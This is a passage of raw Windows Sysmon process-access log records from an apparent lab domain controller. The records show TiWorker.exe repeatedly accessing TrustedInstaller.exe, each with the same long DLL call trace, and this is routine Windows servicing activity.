9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006012Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.543{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006011Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.543{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006010Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.543{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006009Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.543{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006008Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.527{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006007Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.527{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006006Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.527{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006005Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.511{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006004Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.511{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006003Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.511{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006002Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.511{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006001Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.511{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006000Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.496{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005999Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.496{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005998Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.496{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005997Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.496{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005996Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.496{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005995Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.480{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows